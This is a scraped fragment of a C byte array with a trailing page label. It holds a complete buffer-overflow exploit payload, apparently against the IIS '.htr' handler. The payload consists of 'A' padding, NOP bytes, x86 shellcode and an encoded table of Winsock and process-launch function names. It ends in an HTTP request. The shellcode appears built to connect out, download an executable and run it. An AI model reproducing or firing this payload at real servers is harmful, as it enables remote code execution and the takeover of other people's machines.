0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xB0, 0x87, 0x67, 0x68, 0xB0, 0x87, 0x67,
0x68, 0x90, 0x90, 0x90, 0x90, 0x58, 0x58, 0x90, 0x33, 0xC0, 0x50, 0x5B, 0x53, 0x59, 0x8B,
0xDE, 0x66, 0xB8, 0x21, 0x02, 0x03, 0xD8, 0x32, 0xC0, 0xD7, 0x2C, 0x21, 0x88, 0x03, 0x4B,
0x3C, 0xDE, 0x75, 0xF4, 0x43, 0x43, 0xBA, 0xD0, 0x10, 0x67, 0x68, 0x52, 0x51, 0x53, 0xFF,
0x12, 0x8B, 0xF0, 0x8B, 0xF9, 0xFC, 0x59, 0xB1, 0x06, 0x90, 0x5A, 0x43, 0x32, 0xC0, 0xD7,
0x50, 0x58, 0x84, 0xC0, 0x50, 0x58, 0x75, 0xF4, 0x43, 0x52, 0x51, 0x53, 0x56, 0xB2, 0x54,
0xFF, 0x12, 0xAB, 0x59, 0x5A, 0xE2, 0xE6, 0x43, 0x32, 0xC0, 0xD7, 0x50, 0x58, 0x84, 0xC0,
0x50, 0x58, 0x75, 0xF4, 0x43, 0x52, 0x53, 0xFF, 0x12, 0x8B, 0xF0, 0x5A, 0x33, 0xC9, 0x50,
0x58, 0xB1, 0x05, 0x43, 0x32, 0xC0, 0xD7, 0x50, 0x58, 0x84, 0xC0, 0x50, 0x58, 0x75, 0xF4,
0x43, 0x52, 0x51, 0x53, 0x56, 0xB2, 0x54, 0xFF, 0x12, 0xAB, 0x59, 0x5A, 0xE2, 0xE6, 0x33,
0xC0, 0x50, 0x40, 0x50, 0x40, 0x50, 0xFF, 0x57, 0xF4, 0x89, 0x47, 0xCC, 0x33, 0xC0, 0x50,
0x50, 0xB0, 0x02, 0x66, 0xAB, 0x58, 0xB4, 0x50, 0x66, 0xAB, 0x58, 0xAB, 0xAB, 0xAB, 0xB1,
0x21, 0x90, 0x66, 0x83, 0xC3, 0x16, 0x8B, 0xF3, 0x43, 0x32, 0xC0, 0xD7, 0x3A, 0xC8, 0x75,
0xF8, 0x32, 0xC0, 0x88, 0x03, 0x56, 0xFF, 0x57, 0xEC, 0x90, 0x66, 0x83, 0xEF, 0x10, 0x92,
0x8B, 0x52, 0x0C, 0x8B, 0x12, 0x8B, 0x12, 0x92, 0x8B, 0xD7, 0x89, 0x42, 0x04, 0x52, 0x6A,
0x10, 0x52, 0xFF, 0x77, 0xCC, 0xFF, 0x57, 0xF8, 0x5A, 0x66, 0x83, 0xEE, 0x08, 0x56, 0x43,
0x8B, 0xF3, 0xFC, 0xAC, 0x84, 0xC0, 0x75, 0xFB, 0x41, 0x4E, 0xC7, 0x06, 0x8D, 0x8A, 0x8D,
0x8A, 0x81, 0x36, 0x80, 0x80, 0x80, 0x80, 0x33, 0xC0, 0x50, 0x50, 0x6A, 0x48, 0x53, 0xFF,
0x77, 0xCC, 0xFF, 0x57, 0xF0, 0x58, 0x5B, 0x8B, 0xD0, 0x66, 0xB8, 0xFF, 0x0F, 0x50, 0x52,
0x50, 0x52, 0xFF, 0x57, 0xE8, 0x8B, 0xF0, 0x58, 0x90, 0x90, 0x90, 0x90, 0x50, 0x53, 0xFF,
0x57, 0xD4, 0x8B, 0xE8, 0x33, 0xC0, 0x5A, 0x52, 0x50, 0x52, 0x56, 0xFF, 0x77, 0xCC, 0xFF,
0x57, 0xEC, 0x80, 0xFC, 0xFF, 0x74, 0x0F, 0x50, 0x56, 0x55, 0xFF, 0x57, 0xD8, 0x80, 0xFC,
0xFF, 0x74, 0x04, 0x85, 0xC0, 0x75, 0xDF, 0x55, 0xFF, 0x57, 0xDC, 0x33, 0xC0, 0x40, 0x50,
0x53, 0xFF, 0x57, 0xE4, 0x90, 0x90, 0x90, 0x90, 0xFF, 0x6C, 0x66, 0x73, 0x6F, 0x66, 0x6D,
0x54, 0x53, 0x21, 0x80, 0x8D, 0x84, 0x93, 0x86, 0x82, 0x95, 0x21, 0x80, 0x8D, 0x98, 0x93,
0x8A, 0x95, 0x86, 0x21, 0x80, 0x8D, 0x84, 0x8D, 0x90, 0x94, 0x86, 0x21, 0x80, 0x8D, 0x90,
0x91, 0x86, 0x8F, 0x21, 0x78, 0x8A, 0x8F, 0x66, 0x99, 0x86, 0x84, 0x21, 0x68, 0x8D, 0x90,
0x83, 0x82, 0x8D, 0x62, 0x8D, 0x8D, 0x90, 0x84, 0x21, 0x78, 0x74, 0x70, 0x64, 0x6C, 0x54,
0x53, 0x21, 0x93, 0x86, 0x84, 0x97, 0x21, 0x94, 0x86, 0x8F, 0x85, 0x21, 0x94, 0x90, 0x84,
0x8C, 0x86, 0x95, 0x21, 0x84, 0x90, 0x8F, 0x8F, 0x86, 0x84, 0x95, 0x21, 0x88, 0x86, 0x95,
0x89, 0x90, 0x94, 0x95, 0x83, 0x9A, 0x8F, 0x82, 0x8E, 0x86, 0x21, 0x90, 0x98, 0x8F, 0x4F,
0x86, 0x99, 0x86, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x2E,
0x68, 0x74, 0x72, 0x20, 0x48, 0x54, 0x54, 0x50, 0x2F, 0x31, 0x2E, 0x30, 0x0D, 0x0A, 0x0D,
0x0A };
0
相关文章